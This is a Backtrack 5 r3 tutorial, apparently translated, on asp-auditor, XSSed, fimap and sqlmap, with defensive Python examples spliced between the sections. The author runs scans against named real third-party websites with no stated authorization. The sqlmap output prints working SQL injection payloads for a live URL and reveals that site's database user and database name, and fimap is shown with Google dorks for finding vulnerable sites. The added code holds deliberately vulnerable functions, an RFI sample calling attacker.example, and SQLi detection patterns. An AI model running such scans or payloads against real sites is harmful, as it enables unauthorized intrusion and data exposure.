This is a short introduction to some tools written in Perl and Python. Let's go!!
asp-auditor is a Perl script that lets you gather useful information about an ASP.NET web server.
First go to the Backtrack 5 r3 menu entry: /Backtrack/Exploitation Tools/Web Exploitation Tools/asp-auditor.
The following usage text appears:
Usage: ./asp-audit.pl [http://target/app/file.aspx] (opts)
(opts)
-bf brute force ASP.NET version using JS Validate directories.
followed by the prompt:
root@bt:/pentest/web/asp-auditor#
To use the script, run it with the following syntax (the script file is named asp-audit.pl):
perl asp-audit.pl http://website/page.aspx (opts)
After entering the command, the output follows. I used this site: http://conalepsin.edu.mx/apps/chekt/Default.aspx
root@bt:/pentest/web/asp-auditor# perl asp-audit.pl http://conalepsin.edu.mx/apps/chekt/Default.aspx -bf
Sending initial probe request...
Sending path discovery request...
Sending ASP.NET validate discovery request...
Sending ASP.NET Apr/07 XSS Check
Sending application trace request...
Sending null remoter service request...
[ .NET Configuration Analysis ]
Server -> Microsoft-IIS/6.0
ADNVersion -> 2.0.50727
matches -> 2.0.50727.07 Version 2.0 (Visual Studio.NET 2005 CTP) Aug 2005
matches -> 2.0.50727.26 Version 2.0 (Visual Studio.NET 2005 RC / SQL Server 2005 CTP) Sep 2005
matches -> 2.0.50727.42 Version 2.0 RTM (Visual Studio.NET 2005 RTM / SQL Server 2005 RTM) Nov 2005
Sending brute force discovery requests...
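The "Server" and "ADNVersion" values that asp-audit.pl reports above come straight from response headers the server sends on every request. The following is an added example (not part of the page or of asp-auditor) that does the defender's side of that check: it parses a raw HTTP response header block and reports every header that discloses the platform or runtime build. The two responses are constructed samples, not captures from the site above; the header names and the web.config settings named in the comments are standard IIS/ASP.NET ones.

```python
import re

# Constructed sample responses (not captured from the page's target): one header block that
# discloses the platform the way asp-audit.pl's output reports it, and one hardened block.
DISCLOSING_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "X-AspNet-Version: 2.0.50727\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html>...</html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Headers that leak platform or version details, and how each is normally removed:
#   x-aspnet-version  -> <httpRuntime enableVersionHeader="false" /> in web.config
#   x-powered-by      -> <httpProtocol><customHeaders><remove name="X-Powered-By" /> in web.config
#   server            -> on IIS 6 this usually needs URLScan (RemoveServerHeader=1)
DISCLOSING_HEADERS = {
    "server": "web server product/version",
    "x-powered-by": "application framework",
    "x-aspnet-version": "exact .NET runtime build",
    "x-aspnetmvc-version": "ASP.NET MVC version",
}


def parse_headers(raw: str) -> dict:
    """Parse the header block of a raw HTTP response into a lower-cased name -> value dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def version_disclosures(headers: dict) -> list:
    """Return (header, value, reason) for every header that exposes platform details."""
    findings = []
    for name, reason in DISCLOSING_HEADERS.items():
        if name in headers:
            findings.append((name, headers[name], reason))
    return findings


def dotnet_version_build(headers: dict) -> tuple:
    """Split X-AspNet-Version into (major.minor, build) so the build can be compared
    against a release list; returns (None, None) when the header is absent."""
    value = headers.get("x-aspnet-version")
    if not value:
        return (None, None)
    m = re.fullmatch(r"(\d+\.\d+)\.(\d+)", value)
    return (m.group(1), m.group(2)) if m else (value, None)


if __name__ == "__main__":
    for label, raw in (("disclosing", DISCLOSING_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        found = version_disclosures(parse_headers(raw))
        print(label, "->", found or "no disclosure")
```

Running it against the constructed samples reports three findings for the first response and none for the second; a quick way to confirm a hardening change actually removed the headers.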
Finding websites vulnerable to Cross-Site Scripting using Backtrack 5 r3. A little theory: cross-site scripting (XSS) is a common type of web application security hole that allows a third party to inject JavaScript (or code in a similar scripting language) into the pages a user views.
To begin, start Backtrack 5 r3 and, once it is up, open
Applications / Backtrack / Information Gathering / Web Application Analysis / Open Source Analysis / XSSed
This link opens http://www.xssed.com/archive, which displays an archive of websites reported vulnerable to Cross-Site Scripting.
To prevent such attacks, the application must be configured correctly (JavaScript, PHP and VBScript files alike), output must be filtered or encoded, and, in short, every value entered by users must be validated before it is used.
Here I leave this brief manual on using the Fimap tool in Backtrack 5 r3. A little theory: Fimap is a tool written in Python that lets you find and exploit Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities. If you have an Internet connection, it can also search Google for vulnerable paths on websites.
To start, boot Backtrack 5 r3. Once it is up, enter the directory /pentest/web/fimap:
root@bt:~# cd /pentest/web/fimap
root@bt:/pentest/web/fimap# ./fimap.py -u 'http://www.website/news.php?id=108'
You can also search with Google dorks:
root@bt:/pentest/web/fimap# ./fimap.py -u 'index.php?id='
When the website is vulnerable to Remote File Inclusion, the terminal displays a message reporting the exploitable parameter. Fimap is a very good tool for administrators whose main objective is to improve the quality and security of their website.
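What an inclusion scanner probes for is a parameter whose value ends up in an include path unchecked: a remote URL (RFI), a stream wrapper, or a traversal sequence (LFI). The following is an added example (not code from the page or from fimap) in Python that shows the unchecked resolver beside a hardened one that accepts only allow-listed page names, and a classifier an administrator can use to label suspicious values seen in requests. The directory layout, the allowed page names and the sample values are this example's own assumptions.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Assumed application layout (not from the page): page templates live under this directory
# and a request such as news.php?page=news is meant to include pages/news.php.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home", "news", "contact"}

# Constructed sample parameter values of the kinds an inclusion scanner probes with.
SAMPLE_VALUES = [
    "news",
    "../../../../etc/passwd",
    "http://attacker.example/shell.txt",
    "php://filter/convert.base64-encode/resource=index",
]


def include_path_unsafe(page: str) -> str:
    """Deliberately vulnerable: mirrors include($_GET['page'] . '.php') with no checks."""
    return PAGES_DIR + "/" + page + ".php"


def classify(page: str) -> str:
    """Label what an unchecked value would do: rfi, wrapper, traversal or plain."""
    scheme = urlsplit(page).scheme
    if scheme in ("http", "https", "ftp"):
        return "rfi"
    if scheme:  # php://, data://, expect:// and similar stream wrappers
        return "wrapper"
    resolved = posixpath.normpath(posixpath.join(PAGES_DIR, page + ".php"))
    if posixpath.commonpath([PAGES_DIR, resolved]) != PAGES_DIR:
        return "traversal"
    return "plain"


def include_path_safe(page: str):
    """Hardened resolver: a strict allow-list of names, then a fixed path built from it.
    Returns None for anything that is not an allowed page name."""
    if not re.fullmatch(r"[a-z0-9_-]{1,32}", page):
        return None
    if page not in ALLOWED_PAGES:
        return None
    return posixpath.join(PAGES_DIR, page + ".php")


def audit_values(values=SAMPLE_VALUES) -> list:
    """For each value: (value, classification, unchecked path, hardened path or None)."""
    return [(v, classify(v), include_path_unsafe(v), include_path_safe(v)) for v in values]


if __name__ == "__main__":
    for value, kind, unchecked, hardened in audit_values():
        print(f"{kind:9} {value!r:55} -> {hardened or 'rejected'}")
```

The classifier is lexical (it never touches the filesystem), so it can also be applied to the parameter values recorded in access logs to spot inclusion probes after the fact.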
SQLMAP
Sqlmap in Backtrack 5 r3. A little theory: sqlmap is a tool that detects and exploits SQL injection vulnerabilities, and through them can gain full access to the database server behind a web application, regardless of the operating system.
To use the tool, start Backtrack 5 r3 and enter the directory /pentest/database/sqlmap:
root@bt:# cd /pentest/database/sqlmap/
The prompt then shows:
root@bt:/pentest/database/sqlmap#
Next step:
root@bt:/pentest/database/sqlmap# ls
doc lib plugins README.md sqlmap.conf sqlmap.py tamper udf
extra output procs shell _sqlmap.py _sqlmap.pyc txt xml
Then run ./sqlmap.py -u http://www.weburl.com. I used the URL http://www.centro-lomas.com.ar
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.centro-lomas.com.ar/detalles.php?id=1
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
starting at 18:08:56
[18:08:57] [INFO] testing connection to the target url
[18:08:59] [INFO] testing if the url is stable, wait a few seconds
[18:09:00] [INFO] url is stable
[18:09:00] [INFO] testing if GET parameter 'id' is dynamic
[18:09:01] [INFO] confirming that GET parameter 'id' is dynamic
[18:09:01] [INFO] GET parameter 'id' is dynamic
[18:09:02] [INFO] heuristics detected web page charset 'ascii'
[18:09:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[18:09:02] [INFO] testing for SQL injection on GET parameter 'id'
[18:09:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:03] [WARNING] reflective value(s) found and filtering out
[18:09:04] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:09:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:09:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[18:09:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:09:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:09:16] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[18:09:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:09:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[18:09:16] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:09:18] [INFO] target url appears to have 6 columns in query
[18:09:19] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2747=2747
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a7174773a), NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[18:09:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
[18:09:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.centro-lomas.com.ar'
shutting down at 18:09:28
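The session above found the `id` parameter injectable because the application splices the query-string value straight into the SQL text, so `id=1 AND 2747=2747` and a false comparison return different pages (the boolean-based oracle). The following is an added example (not code from the page or from sqlmap) in Python with an in-memory SQLite table: it shows the concatenating lookup beside a validated, parameterized one, and a small scanner that flags the request signatures from the session (sqlmap's User-Agent, `AND n=n`, `SLEEP(n)`, `UNION ALL SELECT`) in constructed access-log lines. The table, column names and log lines are this example's own assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for detalles.php's data (the page shows no schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE detalles (id INTEGER PRIMARY KEY, titulo TEXT)")
    conn.executemany("INSERT INTO detalles VALUES (?, ?)", [(1, "uno"), (2, "dos")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Deliberately vulnerable: the query-string value is concatenated into the SQL text,
    so 'id=1 AND 2747=2747' and 'id=1 AND 2747=2748' return different results."""
    return conn.execute("SELECT id, titulo FROM detalles WHERE id=" + raw_id).fetchall()


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened: reject anything that is not an integer, then bind the value as a parameter."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, titulo FROM detalles WHERE id=?", (id_value,)).fetchall()


# Request signatures seen in the session above, matched after URL-decoding.
SQLI_SIGNATURES = [
    (r"sqlmap", "sqlmap default User-Agent"),
    (r"\bAND\s+\d+=\d+", "boolean-based blind probe"),
    (r"\bSLEEP\(\d+\)", "time-based blind probe"),
    (r"UNION\s+ALL\s+SELECT", "UNION-based probe"),
    (r"INFORMATION_SCHEMA", "schema enumeration"),
]

# Constructed access-log lines in combined log format (not a real capture).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2013:18:09:01 -0300] "GET /detalles.php?id=1 HTTP/1.1" 200 4231 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Jan/2013:18:09:04 -0300] "GET /detalles.php?id=1%20AND%202747%3D2747 HTTP/1.1" 200 4231 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.5 - - [12/Jan/2013:18:09:16 -0300] "GET /detalles.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 4231 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [12/Jan/2013:18:09:20 -0300] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""


def scan_log(text: str) -> list:
    """Return (line_number, [reasons]) for every log line matching a signature."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        decoded = unquote(line)
        reasons = [why for pat, why in SQLI_SIGNATURES if re.search(pat, decoded, re.IGNORECASE)]
        if reasons:
            hits.append((n, reasons))
    return hits


if __name__ == "__main__":
    db = make_db()
    for raw in ("1", "1 AND 2747=2747", "1 AND 2747=2748"):
        print(f"{raw!r:20} unsafe={lookup_unsafe(db, raw)} safe={lookup_safe(db, raw)}")
    for n, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(reasons)}")
```

With the parameterized lookup the true and false payloads both yield nothing, so there is no oracle left to exploit; the log scanner is the complementary control, since a scan like the one above leaves dozens of such lines in a few seconds.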
The tool also includes a wizard that guides you through a run; start it with the following syntax:
./sqlmap.py --wizard
root@bt:/pentest/database/sqlmap# ./sqlmap.py --wizard
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
starting at 18:10:02
Please enter full target URL (-u): http://www.centro-lomas.com.ar/detalles.php?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 3
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2747=2747
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a7174773a), NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
banner: '5.1.66-cll'
current user: 'cenlom09_gestor@localhost'
current database: 'cenlom09_capacitacion'
current user is DBA: None
shutting down at 18:10:53
The wizard guides you through setting up the scan of the website whose vulnerability you want to test.